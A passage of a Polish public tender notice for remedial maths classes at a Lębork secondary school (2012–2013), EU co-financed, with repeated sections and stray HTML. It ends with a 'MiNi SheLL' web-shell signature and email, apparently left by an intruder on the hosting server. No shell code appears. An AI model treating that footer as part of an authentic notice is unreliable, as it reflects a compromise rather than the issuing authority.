8. Dokumentacja wykonania przedmiotu zamówienia
1. Wykonawca będzie zobowiązany do wydania uczestnikom zajęć pozalekcyjnych/wyrównawczych po ich ukończeniu, w ostatnim dniu zajęć pozalekcyjnych/wyrównawczych odpowiednich zaświadczeń potwierdzających uczestnictwo w zajęciach pozalekcyjnych/wyrównawczych. 
2. Wykonawca lub osoby prowadzące zajęcia będą zobowiązane do dostarczenia Zamawiającemu: 
a)	prawidłowo wypełnione i podpisane deklaracje uczestnictwa wszystkich uczniów i uczennic uczestniczących w realizacji zajęć według wzorów otrzymanych od Zamawiającego (wymagane jest dostarczenie deklaracji tylko i wyłącznie tych osób, które w danym miesiącu rozpoczęły udział w zajęciach po raz pierwszy).

b) w ciągu 5 dni od zakończenia każdego miesiąca przeprowadzonych zajęć pozalekcyjnych/wyrównawczych:                                      

- kserokopię dziennika zajęć potwierdzony za zgodność z oryginałem, 
- kserokopię listy obecności potwierdzoną za zgodność z oryginałem,  
- zestawienie liczby zrealizowanych godzin zajęć ze wskazaniem miejsca ich odbywania, liczbę godzin i tematów zajęć za przepracowany miesiąc, 
- miesięczną kartę czasu pracy zawierającą okres realizacji, tematy przeprowadzonych zajęć, godziny ich odbywania i liczbę zrealizowanych godzin,
- plany zajęć na kolejny miesiąc, zawierające co najmniej następujące elementy:
a) temat, 
b) cele, 
c) czas trwania zajęć,
d) metody i formy pracy,
e) środki dydaktyczne,
f) literaturę,
g) charakterystykę materiałów, które powinien otrzymać uczeń.

c)  w ciągu 5 dni od zakończenia zajęć pozalekcyjnych/wyrównawczych: 
- rejestr wydanych zaświadczeń, 
- kserokopie zaświadczeń potwierdzone za zgodność z oryginałem, 
- listę osób potwierdzających odbiór zaświadczeń, 
- oryginał dziennika zajęć, 
- oryginał listy obecności,
- dokumentację fotograficzną ze zrealizowanych zajęć pozalekcyjnych/wyrównawczych,
- harmonogram powykonawczy ( tylko w przypadku, gdy wystąpiły zmiany w realizacji zajęć określone w harmonogramie początkowym).

3. Po zakończeniu każdego miesiąca przeprowadzonych zajęć pozalekcyjnych/wyrównawczych Wykonawcy za wykonanie przedmiotu umowy przysługuje wynagrodzenie ryczałtowe za przepracowane godziny w danym miesiącu. Zapłata następuje w terminie 14 dni od dnia doręczenia Zamawiającemu prawidłowo wystawionej faktury VAT/rachunku oraz innej wymaganej przez Zamawiającego dokumentacji określonej w punkcie 8 ppkt.2.

9. Dodatkowe informacje (wymogi i obowiązki Wykonawcy oraz Zamawiającego)
Nabór uczestników zajęć pozalekcyjnych/wyrównawczych przeprowadzi Zamawiający. Wykonawca jest zobowiązany do przyjęcia na zajęcia pozalekcyjne/wyrównawcze skierowanych przez Zamawiającego uczestników.
Zamawiający zastrzega sobie prawo skierowania do odbycia zajęć pozalekcyjnych/wyrównawczych dodatkowych osób w miejsce osób, które zrezygnują z udziału w projekcie - na etapie, kiedy będzie możliwe uzupełnienie przez nie brakujących zajęć. 

Zamawiający zastrzega sobie (w związku z finansowaniem ze środków unijnych) oraz instytucjom upoważnionym do przeprowadzenia kontroli prawo wglądu do dokumentów Wykonawcy związanych z realizowaniem zamówienia, w tym dokumentów finansowych. 
Zamawiający udostępni Wykonawcy nieodpłatnie pomieszczenia: salę wyposażoną w stoły i krzesła, z dostępem do WC, niezbędne do wykonania zamówienia. Przedmiot zamówienia należy zrealizować w miejscu wskazanym przez Powiat Lęborski na terenie miasta Lęborka.
Zamawiający zapewni sprzęt/urządzenia niezbędne do zrealizowania zajęć, np.: zestawy multimedialne, tablice suchościeralne współfinansowane z EFS.
W ramach projektu nie przewiduje się przyznawania uczestnikom stypendiów i zwrotów kosztów dojazdu na zajęcia.
Wymagania ogólne stawiane Wykonawcy: 
-  Wykonawca ponosi pełną odpowiedzialność za uczniów w czasie trwania zajęć.
- Wykonawca jest odpowiedzialny za jakość prowadzonych zajęć, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.
-  wymagana jest należyta staranność przy realizacji zobowiązań umowy.
-  Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
Wykonawca zobowiązany jest również do:
- bieżącego monitorowania obecności uczestników na zajęciach pozalekcyjnych/wyrównawczych w celu udokumentowania uczestnictwa w projekcie - zgodnie z interpretacją Instytucji Zarządzającej Programem Operacyjnym Kapitał Ludzki warunkiem wydania dokumentu potwierdzającego ukończenie zajęć pozalekcyjnych jest udział, w co najmniej 80% zajęć pozalekcyjnych/wyrównawczych przewidzianych w danym działaniu. 
- prowadzenia dokumentacji prowadzonych zajęć pozalekcyjnych/wyrównawczych, w szczególności: dzienników zajęć, ewidencji obecności uczestników.
- przeprowadzenia wśród uczestników zajęć pozalekcyjnych/wyrównawczych ankiet ewaluacyjnych na rozpoczęcie i zakończenie zajęć - rozdanie i zebranie wypełnionych ankiet. Dodatkowo w trakcie zajęć pozalekcyjnych Wykonawca zbierze i przekaże Zamawiającemu ankiety ewaluacyjne dotyczące oceny wykładowców. 
-  opracowywania narzędzi diagnostycznych do badania efektów nauczania.
-	realizowania zajęć zgodnie z zatwierdzonym przez Zamawiającego programem nauczania.
- odpowiedniego oznaczenia wszystkich miejsc i dokumentów bezpośrednio związanych z realizacją zajęć pozalekcyjnych, tj. korespondencji dotyczącej Projektu i wszystkich innych dokumentów z nim związanych wychodzących od Wykonawcy logotypów Unii Europejskiej oraz Programu Operacyjnego Kapitał Ludzki wraz 
z zamieszczeniem napisu o współfinansowaniu przedmiotu zamówienia ze środków Unii Europejskiej zgodnie 
z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki (zgodnie 
z wytycznymi w zakresie informacji i promocji, które zamieszczone są na stronie internetowej: www.efs.gov.pl). 
-	opracowywania materiałów dydaktycznych wykorzystywanych podczas zajęć pozalekcyjnych/wyrównawczych oraz powielenie i dostarczenie ich każdemu uczestnikowi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie zajęć wyrównawczych z matematyki w ZSO nr 1 dla klasy pierwszej - grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie autorskiego programu nauczania w ZSO nr 1 i przeprowadzenie cyklu zajęć pozalekcyjnych i wyrównawczych dla uczniów/uczennic. Wspieranie uczniów, którzy chcą rozwijać swoje zainteresowania w zakresie matematyki w ramach projektu pn. Tandemem do świetlanej przyszłości. współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie  9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych).
Zamówienie zostało podzielone na 2 części. Opis szczegółowy każdej części zamówienia określono w załączniku nr 1 do SIWZ. Wykonawca może złożyć ofertę na dowolną liczbę części zamówienia, pod warunkiem, że jedna osoba prowadząca zajęcia (wskazana przez Wykonawcę) może uczestniczyć w realizacji co najwyżej dwóch części zajęć realizowanych w ramach projektu, ze względu na realizację zajęć dla kilku grup w tym samym terminie.

Przedmiot zamówienia musi być wykonywany przez osoby prowadzące zajęcia spełniające warunki opisane w rozdziale 8 ust.1 pkt. 4 SIWZ.
2. Cele przedmiotu zamówienia
Celem zajęć pozalekcyjnych jest rozwijanie zainteresowań uczniów oraz wzrost ich kompetencji kluczowych,  świadomości i umiejętności społeczno-kulturalnych. Realizowanie zajęć pozalekcyjnych przyczyni się do wyrównywania dysproporcji edukacyjnych oraz spowoduje zwiększenie zainteresowania przedmiotowego, a co za tym idzie, większe wyspecjalizowanie zawodowe przyszłych absolwentów.
Celem zajęć wyrównawczych jest eliminowanie trudności w nauce i uzupełnienie braków wiedzy.
3. Adresaci
Grupę docelową w projekcie stanowić będzie 865 uczniów (550K i 315M). Zgodnie z Szczegółowym Opisem Priorytetów  będą to uczniowie dwóch placówek oświatowych, prowadzących kształcenie ogólne, posiadających miejsce zamieszkania (w rozumieniu przepisów Kodeksu Cywilnego) na terenie woj. pomorskiego uczęszczających do Zespołu Szkół Ogólnokształcących w nr 1 (ZSO nr 1) i Zespołu Szkół Ogólnokształcących w nr 2 (ZSO nr 2).
W ramach przedmiotu zamówienia w każdej części do udziału w zajęciach pozalekcyjnych skierowanych zostanie po 10 uczniów/uczennic.
4.  Podział na zadania
Każda grupa liczy 10 osób.


Część 2 - Zorganizowanie i przeprowadzenie zajęć wyrównawczych z matematyki w ZSO nr 1 dla klasy pierwszej - grupa 1

Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 10 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 72 godzin zajęć wyrównawczych w zakresie matematyki w klasach I w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
-  październik 2012 - grudzień 2012 = 24 godziny
-  styczeń 2013 r. - czerwiec 2013r. = 48 godzin

5. Czas trwania zajęć pozalekcyjnych i wyrównawczych
Zajęcia będą się odbywać w 2 grupach (1 grupa zajęć pozalekcyjnych, 1 grupa zajęć wyrównawczych). Liczba osób 
w każdej grupie wynosi 10 osób. 
Łączna liczba godzin wynosi 72 godziny na każdą grupę uczestników zajęć.           
Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut. 
Zajęcia pozalekcyjne/wyrównawcze należy przeprowadzić w dni robocze dla ZSO nr 1 Lęborku poza obowiązkowymi godzinami lekcyjnymi według harmonogramu w ujęciu tygodniowym ustalonym z koordynatorem merytorycznym każdej ze szkół, personelem projektu oraz musi on być przedstawiony do zatwierdzenia Zamawiającemu. Terminy i godziny zajęć pozalekcyjnych/wyrównawczych dostosowane będą do najbardziej pożądanych przez odbiorców zajęć. 
6. Wytyczne dotyczące realizacji przedmiotu zamówienia
1.	Osoba prowadząca zajęcia w ramach danej części przedmiotu zamówienia na podstawie testu sprawdzającego posiadaną wiedzę dokona diagnozy braków edukacyjnych 10 uczniów/uczennic skierowanych na zajęcia pozalekcyjne/wyrównawcze. 

2.	Osoba prowadząca zajęcia w ramach danej części przedmiotu zamówienia na podstawie przeprowadzonego testu opracuje i przekaże Zamawiającemu w terminie do 10 dni od daty rozpoczęcia zajęć autorski program nauczania, który musi zawierać następujące informacje:
a)	metryczka programu (ogólne informacje o programie - autor, adresat, geneza programu, koncepcja programu, organizacja zajęć, liczba godzin),
b)	cele ogólne i szczegółowe,
c)	plan nauczania określający nazwę obszarów tematycznych oraz ich wymiar,
d)	przewidywane osiągnięcia uczniów,
e)	literatura (podręczniki, zbiory zadań, skrypty itp.).
Dopuszczalne i wskazane jest wprowadzanie w programie nauczania przez osoby prowadzące zajęcia zmian prowadzących do uzyskania lepszego zrealizowania celów zajęć pozalekcyjnych/wyrównawczych oraz większego dostosowania ich do potrzeb uczestniczących uczniów. O zmianach takich Wykonawca obowiązany jest poinformować Zleceniodawcę w formie pisemnej lub elektronicznej.

3.	Osoba prowadząca zajęcia w ramach danej części przedmiotu zamówienia opracuje i przekaże Zamawiającemu w terminie co najmniej 5 dni przed datą pierwszych zajęć pozalekcyjnych/wyrównawczych na pierwszy miesiąc kalendarzowy zajęć oraz najpóźniej w ciągu 5 dni od rozpoczęcia każdego miesiąca na dany miesiąc zajęć pozalekcyjnych plany zajęć, zawierające co najmniej następujące elementy:
a)	temat, 
b)	cele, 
c)	czas trwania zajęć,
d)	metody i formy pracy,
e)	środki dydaktyczne,
f)	      literaturę,
g)	charakterystykę materiałów, które powinien otrzymać uczeń.

4.	Osoba prowadząca zajęcia w ramach danej części przedmiotu zamówienia będzie zobowiązana do opracowania harmonogramu zajęć pozalekcyjnych/wyrównawczych w terminie do 5 dni przed rozpoczęciem pierwszych zajęć.
Harmonogram zawiera listę planowanych tematów i wymiar godzin przeznaczonych na ich realizację. 
Harmonogram należy ustalić z koordynatorem merytorycznym każdej ze szkół, personelem projektu oraz musi on być przedstawiony do zatwierdzenia Zamawiającemu. Wszelkie zmiany terminów realizacji zajęć dokonywane w harmonogramie zajęć pozalekcyjnych/wyrównawczych  powinny zostać co najmniej 5 dni przed planowaną zmianą przedstawione Zamawiającemu, a w przypadku odwołania zajęć z przyczyn niezależnych od Wykonawcy najpóźniej w dniu zaistnienia takiej okoliczności. Wszystkie zmiany dokonywane w harmonogramie wymagają pisemnej zgody Zamawiającego i nie spowodują konieczności dokonania zmian Umowy w formie aneksu.
5.	Wykonawca będzie zobowiązany do rzetelnego sporządzania i prowadzenia dokumentacji realizacji przedmiotu zamówienia, na podstawie wzorów zatwierdzonych przez Zamawiającego, a w szczególności osoby prowadzące zajęcia zobowiązane będą do prowadzenia dziennika, list obecności z realizacji zajęć pozalekcyjnych/wyrównawczych.
6.	Osoba prowadząca zajęcia w ramach danej części przedmiotu zamówienia zobowiązana jest do opracowania we własnym zakresie i wydania uczestnikom zajęć pozalekcyjnych/wyrównawczych  po ich ukończeniu, w ostatnim dniu zajęć pozalekcyjnych/wyrównawczych, odpowiednich zaświadczeń zaopatrzonych w odpowiednie logotypy oraz informację o współfinansowaniu (zgodnie z wytycznymi w zakresie informacji i promocji, które zamieszczone są na stronie internetowej: www.efs.gov.pl). 
Warunkiem otrzymania w/w dokumentu jest udział ucznia/uczennicy, w co najmniej 80% zajęciach pozalekcyjnych/wyrównawczych przewidzianych w danym działaniu. 
7.	W ramach zajęć pozalekcyjnych/wyrównawczych  należy zaplanować pracę własną uczniów, w tym np. wykonywanie dodatkowych zadań, pracę metodą projektu w grupach kilku uczniów itp. 
8.	Zamawiający wymaga, aby co najwyżej 25 % czasu każdych zajęć stanowiły wykłady/prezentacje, natomiast pozostały czas przeznaczony powinien zostać na zajęcia z wykorzystaniem metod aktywizujących ucznia.
7. Komunikacja pomiędzy Zamawiającym a Wykonawcą
1. Wykonawca będzie zobowiązany do potwierdzania w formie pisemnej lub elektronicznej dyspozycji otrzymanych od Zamawiającego, związanych z bieżącą realizacją zadań wynikających z realizacji przedmiotu zamówienia, w tym zwłaszcza dotyczących terminów i miejsc prowadzenia zajęć pozalekcyjnych/wyrównawczych.
2. Wykonawca będzie zobowiązany do przekazywania Zamawiającemu bieżącej informacji o wszelkich nieprawidłowościach w wykonaniu przedmiotu zamówienia.
3. Wykonawca będzie zobowiązany do umożliwienia Zamawiającemu prowadzenia obserwacji realizowanych zajęć pozalekcyjnych/wyrównawczych.
8. Dokumentacja wykonania przedmiotu zamówienia
1. Wykonawca będzie zobowiązany do wydania uczestnikom zajęć pozalekcyjnych/wyrównawczych po ich ukończeniu, w ostatnim dniu zajęć pozalekcyjnych/wyrównawczych odpowiednich zaświadczeń potwierdzających uczestnictwo w zajęciach pozalekcyjnych/wyrównawczych. 
2. Wykonawca lub osoby prowadzące zajęcia będą zobowiązane do dostarczenia Zamawiającemu: 
a)	prawidłowo wypełnione i podpisane deklaracje uczestnictwa wszystkich uczniów i uczennic uczestniczących w realizacji zajęć według wzorów otrzymanych od Zamawiającego (wymagane jest dostarczenie deklaracji tylko i wyłącznie tych osób, które w danym miesiącu rozpoczęły udział w zajęciach po raz pierwszy).

b) w ciągu 5 dni od zakończenia każdego miesiąca przeprowadzonych zajęć pozalekcyjnych/wyrównawczych:                                      

- kserokopię dziennika zajęć potwierdzony za zgodność z oryginałem, 
- kserokopię listy obecności potwierdzoną za zgodność z oryginałem,  
- zestawienie liczby zrealizowanych godzin zajęć ze wskazaniem miejsca ich odbywania, liczbę godzin i tematów zajęć za przepracowany miesiąc, 
- miesięczną kartę czasu pracy zawierającą okres realizacji, tematy przeprowadzonych zajęć, godziny ich odbywania i liczbę zrealizowanych godzin,
- plany zajęć na kolejny miesiąc, zawierające co najmniej następujące elementy:
a) temat, 
b) cele, 
c) czas trwania zajęć,
d) metody i formy pracy,
e) środki dydaktyczne,
f) literaturę,
g) charakterystykę materiałów, które powinien otrzymać uczeń.

c)  w ciągu 5 dni od zakończenia zajęć pozalekcyjnych/wyrównawczych: 
- rejestr wydanych zaświadczeń, 
- kserokopie zaświadczeń potwierdzone za zgodność z oryginałem, 
- listę osób potwierdzających odbiór zaświadczeń, 
- oryginał dziennika zajęć, 
- oryginał listy obecności,
- dokumentację fotograficzną ze zrealizowanych zajęć pozalekcyjnych/wyrównawczych,
- harmonogram powykonawczy ( tylko w przypadku, gdy wystąpiły zmiany w realizacji zajęć określone w harmonogramie początkowym).

3. Po zakończeniu każdego miesiąca przeprowadzonych zajęć pozalekcyjnych/wyrównawczych Wykonawcy za wykonanie przedmiotu umowy przysługuje wynagrodzenie ryczałtowe za przepracowane godziny w danym miesiącu. Zapłata następuje w terminie 14 dni od dnia doręczenia Zamawiającemu prawidłowo wystawionej faktury VAT/rachunku oraz innej wymaganej przez Zamawiającego dokumentacji określonej w punkcie 8 ppkt.2.

9. Dodatkowe informacje (wymogi i obowiązki Wykonawcy oraz Zamawiającego)
Nabór uczestników zajęć pozalekcyjnych/wyrównawczych przeprowadzi Zamawiający. Wykonawca jest zobowiązany do przyjęcia na zajęcia pozalekcyjne/wyrównawcze skierowanych przez Zamawiającego uczestników.
Zamawiający zastrzega sobie prawo skierowania do odbycia zajęć pozalekcyjnych/wyrównawczych dodatkowych osób w miejsce osób, które zrezygnują z udziału w projekcie - na etapie, kiedy będzie możliwe uzupełnienie przez nie brakujących zajęć. 

Zamawiający zastrzega sobie (w związku z finansowaniem ze środków unijnych) oraz instytucjom upoważnionym do przeprowadzenia kontroli prawo wglądu do dokumentów Wykonawcy związanych z realizowaniem zamówienia, w tym dokumentów finansowych. 
Zamawiający udostępni Wykonawcy nieodpłatnie pomieszczenia: salę wyposażoną w stoły i krzesła, z dostępem do WC, niezbędne do wykonania zamówienia. Przedmiot zamówienia należy zrealizować w miejscu wskazanym przez Powiat Lęborski na terenie miasta Lęborka.
Zamawiający zapewni sprzęt/urządzenia niezbędne do zrealizowania zajęć, np.: zestawy multimedialne, tablice suchościeralne współfinansowane z EFS.
W ramach projektu nie przewiduje się przyznawania uczestnikom stypendiów i zwrotów kosztów dojazdu na zajęcia.
Wymagania ogólne stawiane Wykonawcy: 
-  Wykonawca ponosi pełną odpowiedzialność za uczniów w czasie trwania zajęć.
- Wykonawca jest odpowiedzialny za jakość prowadzonych zajęć, zgodność z warunkami technicznymi                                i jakościowymi opisanymi dla przedmiotu zamówienia.
-  wymagana jest należyta staranność przy realizacji zobowiązań umowy.
-  Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
Wykonawca zobowiązany jest również do:
- bieżącego monitorowania obecności uczestników na zajęciach pozalekcyjnych/wyrównawczych w celu udokumentowania uczestnictwa w projekcie - zgodnie z interpretacją Instytucji Zarządzającej Programem Operacyjnym Kapitał Ludzki warunkiem wydania dokumentu potwierdzającego ukończenie zajęć pozalekcyjnych jest udział, w co najmniej 80% zajęć pozalekcyjnych/wyrównawczych przewidzianych w danym działaniu. 
- prowadzenia dokumentacji prowadzonych zajęć pozalekcyjnych/wyrównawczych, w szczególności: dzienników zajęć, ewidencji obecności uczestników.
- przeprowadzenia wśród uczestników zajęć pozalekcyjnych/wyrównawczych ankiet ewaluacyjnych na rozpoczęcie i zakończenie zajęć - rozdanie i zebranie wypełnionych ankiet. Dodatkowo w trakcie zajęć pozalekcyjnych Wykonawca zbierze i przekaże Zamawiającemu ankiety ewaluacyjne dotyczące oceny wykładowców. 
-  opracowywania narzędzi diagnostycznych do badania efektów nauczania.
-	realizowania zajęć zgodnie z zatwierdzonym przez Zamawiającego programem nauczania.
- odpowiedniego oznaczenia wszystkich miejsc i dokumentów bezpośrednio związanych z realizacją zajęć pozalekcyjnych, tj. korespondencji dotyczącej Projektu i wszystkich innych dokumentów z nim związanych wychodzących od Wykonawcy logotypów Unii Europejskiej oraz Programu Operacyjnego Kapitał Ludzki wraz 
z zamieszczeniem napisu o współfinansowaniu przedmiotu zamówienia ze środków Unii Europejskiej zgodnie 
z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki (zgodnie 
z wytycznymi w zakresie informacji i promocji, które zamieszczone są na stronie internetowej: www.efs.gov.pl). 
-	opracowywania materiałów dydaktycznych wykorzystywanych podczas zajęć pozalekcyjnych/wyrównawczych oraz powielenie i dostarczenie ich każdemu uczestnikowi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com